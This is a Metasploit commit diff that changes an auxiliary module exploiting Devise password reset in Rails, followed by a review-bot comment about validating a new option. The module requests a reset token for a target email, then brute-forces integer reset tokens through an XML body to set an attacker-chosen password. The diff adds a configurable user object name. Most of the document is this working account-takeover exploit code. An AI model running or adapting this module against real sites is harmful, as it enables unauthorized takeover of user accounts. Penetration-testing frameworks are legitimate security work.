Land #2705, @jjarmoc's user object configuration on rails_devise_pass_reset

bug/bundler_fix
jvazquez-r7 2013-12-02 11:04:29 -06:00
commit ba39a8e826
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 9 additions and 7 deletions


@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']),
OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
OptString.new('PASSWORD', [true, 'The password to set']),
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def generate_token(account)
# CSRF token from GET "/users/password/new" isn't actually validated it seems.
postdata="user[email]=#{account}"
postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
encode_pass = REXML::Text.new(password).to_s
xml = ""
xml << "<user>"
xml << "<#{datastore['OBJECTNAME']}>"
xml << "<password>#{encode_pass}</password>"
xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
xml << "</user>"
xml << "</#{datastore['OBJECTNAME']}>"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -144,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
def run
# Clear outstanding reset tokens, helps ensure we hit the intended account.
print_status("Clearing existing tokens...")
clear_tokens() if datastore['FLUSHTOKENS']
if datastore['FLUSHTOKENS']
print_status("Clearing existing tokens...")
clear_tokens()
end
# Generate a token for our account
print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
status = generate_token(datastore['TARGETEMAIL'])
@ -162,4 +164,4 @@ class Metasploit3 < Msf::Auxiliary
status = reset_one(datastore['PASSWORD'], true)
status ? print_good("Password reset worked successfully") : print_error("Failed to reset password")
end
end
end
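Review bot: OBJECTNAME is used unvalidated in `postdata="#{datastore['OBJECTNAME']}[email]=#{account}"` and in the opening and closing XML tags of the reset request, whereas the password next to it goes through `REXML::Text` first. A value that is not a plain identifier would give a malformed body or mismatched tags, and the module would only report a failed reset with no hint that the option was at fault. Consider checking it once at the top of `run`, for example `return print_error("OBJECTNAME must be a plain identifier") unless datastore['OBJECTNAME'] =~ /\A[A-Za-z_]\w*\z/`. The option text 'The user object name' could also say that the value becomes both the form parameter prefix and the XML root element. Both `generate_token` and the method that builds the XML continue outside the visible hunks.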